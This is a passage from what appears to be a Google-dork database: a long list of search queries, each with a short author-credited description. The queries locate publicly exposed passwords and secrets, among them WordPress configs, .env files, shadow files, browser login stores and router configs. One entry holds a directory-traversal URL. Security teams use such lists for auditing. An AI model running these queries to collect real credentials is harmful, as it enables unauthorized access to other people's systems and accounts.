formhistory.sqlite\r\n\r\n\r\nCookies -> cookies.sqlite\r\n\r\n\r\nSecurity certificate settings -> cert8.dbcert9.db\r\n\r\n\r\nFile types and download actions -> mimeTypes.rdfhandlers.json\r\n\r\n\r\n\r\n\r\nBruno Schmid\r\n||\r\n|\r\n|https://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index.of\" \"places.sqlite\" \"Mail\" thunderbird -mozilla.org -scan", "description": "Dork containing Thunderbird directories with very Juicy info and passwords\r\n\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "filetype:config \"\" \"password\" \"web.config\" -stackoverflow -youtube.com -github", "description": "Passwords which are stored in the ASP.NET Web.config file which is also \r\nan XML file. This file is mostly used for Authentication, Authorization, \r\nMembership Provider, Role Provider and Profile Provider Settings. Other \r\njuicy info shall be in the file as well.\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://www.linkedin.com/in/schmidbruno"}, {"dork": "ext:ini Robust.ini filetype:ini \"password\"", "description": "Robust server configuration files containing passwords\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "Codeigniter filetype:sql intext:password | pwd intext:username | uname intext: Insert into users values", "description": "This dork allow you to specific find file contains Username,\r\nPassword, Secret Keys and allows you to search for sql configuration file.\r\n\r\nArya Usha"}, {"dork": "inurl:\"servlet/ViewFormServlet?\" \"pwd\"", "description": "BMC Remedy Mid Tier gives username and password in the url.\r\nSome commands are also possible, like password reset and so on.\r\n\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"Index of\" intext:\"Login Data\"", "description": "Description :\r\nGoogle Chrome saved login credentials SQLite files.\r\n\r\nDork :\r\nintitle:\"Index of\" intext:\"Login Data\"\r\n\r\nAuthor:\r\nVipin Joshi (@vocuzi)"}, {"dork": "inurl:\"/App.Config\" + ext:config + \"password=\" -github -git", "description": "inurl:\"/App.Config\" + ext:config + \"password=\" -github -git\r\n\r\nFile containing passwords\r\n\r\nManhNho"}, {"dork": "intext:\"PuTTY log\" ext:log \"password\" -supportforums -github", "description": "intext:\"PuTTY log\" ext:log \"password\" -supportforums -github\r\n\r\nFile containing passwords\r\n\r\nManhNho"}, {"dork": "filetype:doc inurl:\"gov\" intext:\"default password is\"", "description": "Pages from gov domain with default passwords assigned in their systems.\r\nAlso try \"pdf\" and \"txt\" in the file type.\r\n\r\nSome of the default passwords being used are P4ssw0rd, #P@ssw0rd2013,\r\nshadow, 39pL4q, WELCOME1, master.\r\n\r\nVaibhav Dhote"}, {"dork": "site:trello.com intext:mysql AND intext:password -site:developers.trello.com -site:help.trello.com", "description": "Public Trello Boards with Juicy Stuff\r\n\r\nsite:trello.com intext:mysql AND intext:password -site:developers.trello.com\r\n-site:help.trello.com\r\n\r\nDec0y"}, {"dork": "site:showmyhomework.co.uk/school/homeworks/ \"password\"", "description": "Shows educational site passwords left for students, meant to be accessed\r\nvia login portal\r\n\r\nFound by @LewisBugBounty / fifteen@riseup.net"}, {"dork": "intitle:\"index.of\" inurl:\"cvs\" login | passwd | password | access | pass -github -pub", "description": "Files and directories containing passwords and other juicy info\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "filetype:env intext:REDIS_PASSWORD", "description": ".env files with password and username in plain-text of Redis, used in\r\nLaravel and other web apps\r\n\r\nOther:\r\nfiletype:env intext:APP_KEY=\r\n\r\nAmal Jossy"}, {"dork": "\"password.xlsx\" ext:xlsx", "description": "\"password.xlsx\" ext:xlsx\r\n\r\nexcel files containing password\r\n\r\nManhNho"}, {"dork": "inurl:wp-config-backup.txt", "description": "inurl:wp-config-backup.txt\r\nYou can see user and pass database\r\n\r\nmaxbomb"}, {"dork": "intext:define('AUTH_KEY', ' wp-config.php filetype:txt", "description": "WordPress config files\r\n\r\nMattias Borg"}, {"dork": "inurl:/dbcp.properties + filetype:properties -github.com", "description": "inurl:/dbcp.properties + filetype:properties -github.com\r\n\r\nfile containing password\r\n\r\nManhNho"}, {"dork": "inurl:configuration.php and intext:\"var $password=\"", "description": "Dork: *inurl:configuration.php and intext:\"var $password=\" *\r\n\r\nA Google dork that gives\r\nthe information about target database. Containing username and password in\r\nplain text. \r\n\r\nDork discovered by: Sachin Wagh (@tiger_tigerboy)"}, {"dork": "intext:\"please change your\" password |code | login file:pdf | doc | txt | docx -github", "description": "Passwords\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"login\" department | admin | manager | company | host filetype:xls | xlsx -community -github", "description": "Some spreadsheet containing passwords\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"rabbit_password\" | \"service_password\" filetype:conf", "description": "Passwords in openstack setups.\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "\"whoops! there was an error.\" \"db_password\"", "description": "Dork with lots of passwords!.\r\n\r\n\r\nDork discover by Rootkit Pentester."}, {"dork": "inurl:wp-config.bak", "description": "inurl:wp-config.bak\r\n\r\nThis Google Dork discovers badly configured servers exposing sensitive \r\nWordpress setup information.\r\n\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "\"battlefield\" \"email\" site:pastebin.com", "description": "Hacked EA/Origin passwords"}, {"dork": "inurl:\"wp-license.php?file=../..//wp-config\"", "description": "inurl:\"wp-license.php?file=../..//wp-config\"\r\n\r\nFile contain password and directory traversal vulnerability\r\n\r\nManhNho"}, {"dork": "inurl:\"trello.com\" and intext:\"username\" and intext:\"password\"", "description": "Looking for the Username & Password from the public Trello board\r\n\r\nSang Bui"}, {"dork": "intitle:\"index of\" intext:login.csv", "description": "intitle:\"index of\" intext:login.csv\r\n\r\n\r\nThis Google Dork discovers servers with open directories exposing login \r\ninformation files.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "inurl:\"build.xml\" intext:\"tomcat.manager.password\"", "description": "Google Dork: Files Containing Passwords\r\ninurl:\"build.xml\" intext:\"tomcat.manager.password\" \r\nAuthor: Xin Min\r\nThis dork allows you to search for password of tomcat manager."}, {"dork": "/_wpeprivate/config.json", "description": "file containing password ;)\r\n\r\nManhNho"}, {"dork": "inurl:\"standalone.xml\" intext:\"password>\"", "description": "Google Dork: Files Containing Passwords\r\ninurl:\"standalone.xml\" intext:\"password>\"\r\nAuthor: Xin Min\r\nThis dork allows you to search for password of wildfly or jboss configuration."}, {"dork": "filetype:reg reg HKEY_CURRENT_USER intext:password", "description": "Get passwords from registry.\r\n\r\nYou can also use\r\n\r\nfiletype:reg reg HKEY_CURRENT_USER \r\n\r\nThis would be a good way to find out details about the target software in\r\nthe target machine.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "filetype:txt $9$ JunOS", "description": "filetype:txt $9$ JunOS\r\n\r\nDiscover Juniper Junos OS Hashes\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "intext:jdbc:oracle filetype:java", "description": "Find Oracle Database Credentials:\r\n\r\nintext:jdbc:oracle filetype:java\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "filetype:xml config.xml passwordHash Jenkins", "description": "Find Jenkins Password Hashes\r\n\r\n\r\nfiletype:xml config.xml passwordHash Jenkins\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "username | password inurl:resources/application.properties -github.com -gitlab", "description": "Credentials\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:settings.py intext:EMAIL_HOST_PASSWORD -git -stackoverflow", "description": "Description :\r\nDjango Web Framework email config plain-text Credentials.\r\n\r\nDork :\r\nintitle:settings.py intext:EMAIL_HOST_PASSWORD -git -stackoverflow\r\n\r\nAuthor :\r\nVipin Joshi (@vocuzi)"}, {"dork": "intitle:settings.py intext:EMAIL_USE_TLS -git -stackoverflow", "description": "Description :\r\nDjango Web Framework TLS using email configs containing login credentials\r\nin Plain Text\r\n\r\nDork :\r\nintitle:settings.py intext:EMAIL_USE_TLS -git -stackoverflow\r\n\r\nAuthor:\r\nVipin Joshi (@vocuzi)"}, {"dork": "inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner", "description": "Description :\r\nPlain text wordpress config responses, exposing DB passwords\r\n\r\nDork:\r\ninurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner\r\n\r\nAuthor:\r\nVipin Joshi(@vocuzi)"}, {"dork": "inurl:login.txt filetype:txt", "description": "I used this dork while doing some botnet research. All sorts of interesting\r\nfiles pertaining to usernames/passwords for various C&C servers, devices,\r\netc.\r\n\r\ninurl:login.txt filetype:txt"}, {"dork": "s3 site:amazonaws.com filetype:xls password", "description": "excel files containing user id and password information stored on AWS S3\r\nbuckets\r\n\r\n*Google Dork*\r\n\r\ns3 site:amazonaws.com filetype:xls password\r\n\r\n*Dates: *22-05-2019\r\n\r\n*Dork Author:* acc3ssp0int\r\n\r\n*Tested on:* any OS with a functioning browser running Google.com"}, {"dork": "intext:\"wordpress\" filetype:xls login & password", "description": "Excel files containing the user names and passwords.\r\n\r\nGoogle Dork: *intext:\"wordpress\" filetype:xls login & password*\r\n\r\nAuthor: Prasad Borvankar."}, {"dork": "inurl:users.json + \"username\"", "description": "inurl:users.json + \"username\"\r\n\r\nFile contain usernames and passwords\r\n\r\nManhNho"}, {"dork": "intext:\"aspx\" filetype:txt login & password", "description": "# Exploit Title: text files containing the user names and passwords.\r\n\r\n# Google Dork: intext:\"aspx\" filetype:txt login & password\r\n\r\n# Author: ahmed mohammed adel - from egypt\r\n\r\n@hmed@del"}, {"dork": "\"pass\" \"usuario\" filetype:sql", "description": "Leak user and password (hashed) in sql files\r\n\r\n\"usuario\" \"clave\" filetype:sql\r\n\"usuario\" \"pass\" filetype:sql\r\n\"usuario\" \"pwd\" filetype:sql\r\n\"pass\" \"correo\" filetype:sql -github.com"}, {"dork": "intitle:\"index of\" \"htpasswd.txt\"", "description": "Files containing password:\r\n\r\nintitle:\"index of\" \"htpasswd.txt\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" \"ftp.passwd\"", "description": "files containing password:\r\n\r\nintitle:\"index of\" \"ftp.passwd\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intext:\"@gmail.com\" intext:\"password\" inurl:/files/ ext:txt", "description": "files containing email and password:\r\n\r\nintext:\"@gmail.com\" intext:\"password\" inurl:/files/ ext:txt\r\next:txt intext:\"@gmail.com\" intext:\"password\"\r\n\r\n\r\nReza Abasi(Turku)"}, {"dork": "\"contrasena\" filetype:sql -github.com", "description": "Google Dork: \"contrasena\" filetype:sql -github.com\r\nDate: 09/14/2019\r\nExploit Author: th3d3xt3r\r\nCategory: Files containing passwords"}, {"dork": "intitle:\"Index of\" password.txt", "description": "Dork:\r\nintitle:\"Index of\" password.txt\r\n\r\nAuthor:Ismail Tasdelen\r\n\r\nInfo:\r\nIt contains password clear text sensitive information."}, {"dork": "intitle:\"index of\" \"db.conf\"", "description": "Files containing password:\r\n\r\nintitle:\"index of\" \"db.conf\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" share.passwd OR cloud.passwd OR ftp.passwd -public", "description": "Dorks containing passwords.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:index.of \"creds.txt\"", "description": "Dork:\r\nintitle:index.of \"creds.txt\"\r\n\r\nDescription:\r\nThis dork queries google to find publicly available credential files.\r\n\r\nCategory:\r\nFiles Containing Juicy Info."}, {"dork": "intext:\"username=\" AND \"password=\" ext:log", "description": "Log files containing credentials"}, {"dork": "intext:\"WPENGINE_SESSION_DB_USERNAME\" || \"WPENGINE_SESSION_DB_PASSWORD\"", "description": "WPEngine credentials exposed\r\n\r\n-- \r\n\r\n*Hilary Soita.*"}, {"dork": "intitle:\"index of\" \"passwords.yml\"", "description": "# Google Dork: intitle:\"index of\" \"passwords.yml\"\r\n\r\n# By using this dork, usernames and passwords can be found.\r\n\r\n# Date: 18/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"credentials.yml\"", "description": "# Google Dork: intitle:\"index of\" \"credentials.yml\"\r\n\r\n# By using this dork, files containing encrypted credentials can be found.\r\n\r\n# Date: 18/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"enable password\" ext:cfg -git -cisco.com", "description": "# Google Dork: \r\n\"enable password\" ext:cfg -git -cisco.com\r\npassword aux-password ext:cfg -git -cisco.com\r\npassword vty-password ext:cfg -git -cisco.com\r\nservice password-encryption ext:cfg -git -cisco.com\r\nintext:\"set enablepass password\"\r\n\"set enablepass password\" ext:txt\r\nintext:\"password encrypted\" filetype:txt\r\n\"password encrypted\" ext:cfg\r\n\r\n# By using this dork, passwords in Cisco configuration files can be found.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "password console-password ext:cfg -git", "description": "# Google Dork: password console-password ext:cfg -git\r\n\r\n# By using this dork, passwords in configuration files can be found.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:authentication set encrypted-password ext:cfg", "description": "# Google Dork: intext:authentication set encrypted-password ext:cfg\r\n\r\n# By using this dork, passwords in configuration files can be found.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Index of\" dbconnect.inc", "description": "# Google Dork: intitle:\"Index of\" dbconnect.inc\r\n\r\n# By using this dork, the dbconnect.inc file which contains the\r\npassword for the database administrator in clear text .. can be found.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"create account\" admin ext:cfg", "description": "# Google Dork: \"create account\" admin ext:cfg\r\n\r\n# By using this dork, admin passwords in configuration files can be found.\r\n\r\n# Date: 21/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"configure account user encrypted\" ext:cfg", "description": "# Google Dork: \"configure account user encrypted\" ext:cfg\r\n\tintext:\"configure account user encrypted\"\r\n\tintext:\"configure account admin encrypted\"\r\n \"configure account admin encrypted\" ext:cfg\r\n\r\n# By using this dork, user passwords in configuration files can be found.\r\n\r\n# Date: 21/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"d-i passwd/root-password-crypted password\" ext:cfg", "description": "# Google Dork: \r\n\"d-i passwd/root-password-crypted password\" ext:cfg\r\n\"d-i passwd/user-password-crypted\" ext:cfg\r\nintext:\"d-i network-console/password\"\r\n\r\n# By using this dork, usernames and passwords in configuration files can be\r\nfound.\r\n\r\n# Date: 23/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"db.connection.js\"", "description": "#Google Dork: intitle:\"index of\" \"db.connection.js\"\r\n\r\n# By using this dork, some database passwords can be found.\r\n\r\n# Date: 27/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" application.ini", "description": "# Google Dork: intitle:\"index of\" application.ini\r\n\r\n# Applications' configuration files containing usernames and passwords.\r\n\r\n# Date: 20/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"database.ini\" OR \"database.ini.old\"", "description": "# Google Dork: intitle:\"index of\" \"database.ini\" OR \"database.ini.old\"\r\n\r\n# Configuration files containing database usernames and passwords.\r\n\r\n# Date: 20/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"admin password irreversible-cipher\" ext:txt OR ext:log OR ext:cfg", "description": "# Google Dork: \"admin password irreversible-cipher\" ext:txt OR ext:log OR\r\next:cfg\r\n\r\n# Configuration files containing usernames and passwords.\r\n\r\n# Date: 22/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"super password level 3 cipher\" ext:txt OR ext:log", "description": "# Google Dork: \"super password level 3 cipher\" ext:txt OR ext:log\r\n\r\n# Configuration files containing usernames and passwords.\r\n\r\n# Date: 22/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"db.ini\"", "description": "# Google Dork: intitle:\"index of\" \"db.ini\"\r\n\r\n# Configuration files containing database usernames and passwords.\r\n\r\n# Date: 22/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of \" \"*.passwords.txt\"", "description": "#Description : \r\nintitle:\"index of \" \"*.passwords.txt\"\r\nintitle:\"index of\" inurl:passwords\r\nintitle:\"index of /\" \"credentials.zip\"\r\nintitle:\"index of /\" \"passwords.zip\"\r\nintitle:\"index of /\" \"tokens.zip\"\r\n\r\nFile containing username and passwords\r\nAuthor : Vaibhav Lakhani\r\nDate : 22 April 2020\r\n\r\n*Screenshot :*\r\n\r\n[image: image.png]\r\n\r\n-- \r\nRegards,\r\nVaibhav Lakhani"}, {"dork": "\"MasterUserPassword\" ext:cfg OR ext:log OR ext:txt -git", "description": "# Google Dork: \"MasterUserPassword\" ext:cfg OR ext:log OR ext:txt -git\r\n\r\n# By using this dork some exposed master user passwords can be found.\r\n\r\n# Date: 27/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"/etc/shadow root:$\" ext:cfg OR ext:log OR ext:txt OR ext:sql -git", "description": "# Google Dork: \"/etc/shadow root:$\" ext:cfg OR ext:log OR ext:txt OR\r\next:sql -git\r\n\r\n# By using this dork some root passwords in /etc/shadow can be found.\r\n\r\n# Date: 27/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:*helpdesk* intext:\"your default password is\"", "description": "Author: MiningOmerta\r\nInformation: Finds default passwords in some pleace that may have not been seen before\r\n\r\nDork:\r\n\r\ninurl:*helpdesk* intext:\"your default password is\""}, {"dork": "intitle:\"index of\" \"passwords.xlsx\"", "description": "Dork: intitle:\"index of\" \"passwords.xlsx\"\r\nDescription: This Google dork lists out sensitive passwords stored in a\r\nexcel file for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"config.neon\" OR \"config.local.neon\"", "description": "# Google Dork: intitle:\"index of\" \"config.neon\" OR \"config.local.neon\"\r\n\r\n# Juicy information, sensitive directories including db usernames and passwords.\r\n\r\n# Date: 7/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intext:\"Index of /password\"", "description": "Dork: intext:\"Index of /password\"\r\nDescription: This google dorks lists out password folders on web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "\"config.php.bak\" intitle:\"index of\"", "description": "# Dork: \"config.php.bak\" intitle:\"index of\"\r\n# Date: 2020-06-02\r\n# Exploit Author: M.Harsha vardhan\r\n#Description : This dorks leaks the db user_pass from backup files of database/phpmyadmin"}, {"dork": "\"index of\" \".env\"", "description": "# Title: Sensitive file disclosure containing passwords.\r\n# Google Dork: \"index of\" \".env\"\r\n# Date: 04/06/2020\r\n# Author: Ritik Sahni"}, {"dork": "filetype:env \"DB_PASSWORD\"", "description": "# Dork : filetype:env \"DB_PASSWORD\"\r\n# This Dork reveals the .env files that contain Strings about Database Passwords, Hence revealing the passwords to the database found.\r\n# Author : Shivanshu Sharma"}, {"dork": "\"MYSQL_ROOT_PASSWORD:\" ext:env OR ext:yml -git", "description": "# Google Dork: \"MYSQL_ROOT_PASSWORD:\" ext:env OR ext:yml -git\r\n# Juicy information and sensitive directories including user names and passwords.\r\n# Date: 18/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"/master.passwd\"", "description": "# Google Dork: intitle:\"index of\" \"/master.passwd\"\r\n# Date: 30/06/2020\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:logs intext:GET https:// ext:txt intext:password intext:username", "description": "Dork: inurl:logs intext:GET https:// ext:txt intext:password intext:username\r\nDescription: this dork will return username and password sent in GET\r\nrequest from proxies logs.\r\nAuthor: Sandeep kumar"}, {"dork": "allintext:password filetype:log", "description": "Dork:allintext:password filetype:log\r\nDescription:contains information related to password type website and log\r\nAuthor:Mohd Asif Khan"}, {"dork": "\"Index of\" \"/yahoo_site_admin/credentials\"", "description": "Google Dork: \"Index of\" \"/yahoo_site_admin/credentials\"\r\nTitle: File containing passwords\r\nDate: 01/07/2020\r\nAuthor : Mohit Khemchandani"}, {"dork": "intext:\"db_database\" ext:env intext:\"db_password\"", "description": "# Google Dork: intext:\"db_database\" ext:env intext:\"db_password\"\r\n# Exposed database credentials (username and password).\r\n# Date: 23/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintext:\"redis_password\" ext:env", "description": "# Google Dork: allintext:\"redis_password\" ext:env\r\n# Exposed Redis Passwords found in .env files.\r\n# Date: 05/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"EMAIL_HOST_PASSWORD\" ext:yml | ext:env | ext:txt | ext:log", "description": "# Google Dork: \"EMAIL_HOST_PASSWORD\" ext:yml | ext:env | ext:txt | ext:log\r\n# Exposed passwords.\r\n# Date: 14/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"/** MySQL database password */\" ext:txt | ext:cfg | ext:env | ext:ini", "description": "# Google Dork: \"/** MySQL database password */\" ext:txt | ext:cfg | ext:env\r\n| ext:ini\r\n\r\n# MySQL database usernames and passwords.\r\n\r\n# Date: 1/09/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"POSTGRES_PASSWORD=\" ext:txt | ext:cfg | ext:env | ext:ini | ext:yml | ext:sql -git -gitlab", "description": "# Google Dork: \"POSTGRES_PASSWORD=\" ext:txt | ext:cfg | ext:env | ext:ini | ext:yml | ext:sql -git -gitlab\r\n# Exposed passwords.\r\n# Date: 15/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "ext:xls intext:@gmail.com intext:password", "description": "Dork: ext:xls intext:@gmail.com intext: password\r\nIt will return the spreadsheets(xls) that contains some email and passwords\r\nwhich can be exploited by anyone."}, {"dork": "intitle:\"database.php\" inurl:\"database.php\" intext:\"db_password\" -git -gitlab", "description": "# Google Dork: intitle:\"database.php\" inurl:\"database.php\" intext:\"db_password\" -git -gitlab\r\n# Exposed database usernames and passwords.\r\n# Date: 22/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "ext:txt intext:@yahoo.com intext:password", "description": "# Google Dork: ext:txt intext:@yahoo.com intext:password\r\n# By using this dorks,It will return the text file that contains some email\r\nand passwords which can be exploited by anyone.\r\n# Date: 22/09/2020\r\n# Author: Dharmveer Singh"}, {"dork": "\"'username' =>\" + \"'password' =>\" ext:log", "description": "# Google Dork: \"'username' =>\" + \"'password' =>\" ext:log\r\n# Exposed passwords, and much more...\r\n# Date: 22/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "filetype:log intext:password after:2015 intext:@gmail.com | @yahoo.com | @hotmail.com", "description": "Category: Log Files Containing Latest Passwords\r\n\r\nYours Sincerely,\r\nAnurodh Acharya"}, {"dork": "\"index of\" \"password.ini\"", "description": "# Google Dork: \"index of\" \"password.ini\"\r\n# Description :- Dork shows configuration files for password.\r\n# Date: 23/09/2020\r\n# Author: Sahil Saxena\r\n# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174\r\n\r\nThanks,\r\nSahil Saxena"}, {"dork": "\"admin_password\" ext:txt | ext:log | ext:cfg", "description": "# Google Dork: \"admin_password\" ext:txt | ext:log | ext:cfg\r\n# Admin passwords.\r\n# Date: 29/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "rootpw --iscrypted ext:cfg", "description": "# Google Dork: rootpw --iscrypted ext:cfg\r\n\r\n# Exposed passwords.\r\n\r\n# Date: 5/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"anaconda-ks.cfg\" | \"ks.cfg\" ext:cfg -git -gitlab", "description": "# Google Dork: \"anaconda-ks.cfg\" | \"ks.cfg\" ext:cfg -git -gitlab\r\n\r\n# Sensitive directories containing passwords.\r\n\r\n# Date: 6/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"server.cfg\" ext:cfg intext:\"rcon_password\" -git -gitlab", "description": "# Google Dork: \"server.cfg\" ext:cfg intext:\"rcon_password\" -git -gitlab\r\n\r\n# Exposed passwords found in server.cfg files.\r\n\r\n# Date: 7/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "ext:cfg \"g_password\" | \"sv_privatepassword\" | \"rcon_password\" -git -gitlab", "description": "# Google Dork: ext:cfg \"g_password\" | \"sv_privatepassword\" | \"rcon_password\" -git -gitlab\r\n\r\n# Exposed passwords found in .cfg files.\r\n\r\n# Date: 8/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"db.username\" + \"db.password\" ext:properties", "description": "# Google Dork: \"db.username\" + \"db.password\" ext:properties\r\n\r\n# Files containing usernames and passwords.\r\n\r\n# Date: 13/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:pastebin.com intext:admin.password", "description": "Name: Paramjot Singh\r\nCategory: Files Containing Passwords\r\nDescription: This dork helps in finding dumped admin:password combos.\r\n\r\nAttached Images can be found below:"}, {"dork": "ext:log password END_FILE", "description": "Dear Team,\r\n\r\n# Exploit Title: *ext:log password END_FILE*\r\n# Google Dork: *ext:log password END_FILE*\r\n# Juicy Information : Java password files\r\n# Date: 18/10/2020\r\n# Exploit Author: Sajan Dhakate\r\n\r\nThanks & Regards\r\nSajan Dhakate"}, {"dork": "\"spring.datasource.password=\" + \"spring.datasource.username=\" ext:properties -git -gitlab", "description": "# Google Dork: \"spring.datasource.password=\" +\r\n\"spring.datasource.username=\" ext:properties -git -gitlab\r\n\r\n# Files containing usernames and passwords.\r\n\r\n# Date: 11/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:javascript -git -gitlab", "description": "# Google Dork : jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:javascript -git -gitlab\r\n\r\n# Description : Exposed usernames and passwords.\r\n\r\n# Date: 22/10/2020\r\n\r\n# Author: Jose Praveen"}, {"dork": "jdbc:postgresql://localhost: + username + password ext:yml | ext:java -git -gitlab", "description": "# Google Dork: jdbc:postgresql://localhost: + username + password ext:yml | ext:java -git -gitlab\r\n# Exposed usernames and passwords.\r\n# Date: 29/10/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "jdbc:oracle://localhost: + username + password ext:yml | ext:java -git -gitlab", "description": "# Google Dork: jdbc:oracle://localhost: + username + password ext:yml | ext:java -git -gitlab\r\n# Exposed usernames and passwords.\r\n# Date: 29/10/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"config.exs\" | \"dev.exs\" | \"test.exs\" | \"prod.secret.exs\"", "description": "# Google Dork: intitle:\"index of\" \"config.exs\" | \"dev.exs\" | \"test.exs\" | \"prod.secret.exs\"\r\n# Sensitive directories containing many times usernames and passwords.\r\n# Date: 12/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"define('DB_USER',\" + \"define('DB_PASSWORD',\" ext:txt", "description": "# Google Dork: \"define('DB_USER',\" + \"define('DB_PASSWORD',\" ext:txt\r\n# Sensitive directories containing Database usernames and passwords.\r\n# Date: 18/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"anaconda-ks.cfg\" | \"anaconda-ks-new.cfg\"", "description": "# Google Dork: intitle:\"index of\" \"anaconda-ks.cfg\" | \"anaconda-ks-new.cfg\"\r\n\r\n# Files containing passwords.\r\n\r\n# Date: 20/11/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"define('SECURE_AUTH_KEY'\" + \"define('LOGGED_IN_KEY'\" + \"define('NONCE_KEY'\" ext:txt | ext:cfg | ext:env | ext:ini", "description": "# Google Dork: \"define('SECURE_AUTH_KEY'\" + \"define('LOGGED_IN_KEY'\" + \"define('NONCE_KEY'\" ext:txt | ext:cfg | ext:env | ext:ini\r\n# Files containing passwords, keys, and more...\r\n# Date: 25/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"keystorePass=\" ext:xml | ext:txt -git -gitlab", "description": "# Google Dork: \"keystorePass=\" ext:xml | ext:txt -git -gitlab\r\n\r\n# Files containing passwords.\r\n\r\n# Date: 27/11/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:construct('mysql:host", "description": "# Google Dork: intext:construct('mysql:host\r\n# Date: 12/1/2020\r\n# Exploit Author: Javier Bernardo\r\n\r\nFiles containing passwords\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "\"mailer_password:\" + \"mailer_host:\" + \"mailer_user:\" + \"secret:\" ext:yml", "description": "# Google Dork: \"mailer_password:\" + \"mailer_host:\" + \"mailer_user:\" + \"secret:\" ext:yml\r\n# Files containing email username and password and more...\r\n# Date: 10/12/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"idx_config\"", "description": "# Google Dork: intitle:\"index of\" \"idx_config\"\r\n\r\n# Files containing usernames, passwords and much more...\r\n\r\n# Date: 11/1/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"password 7\" ext:txt | ext:log | ext:cfg", "description": "# Google Dork: \"password 7\" ext:txt | ext:log | ext:cfg\r\n# Files containing passwords.\r\n# Date: 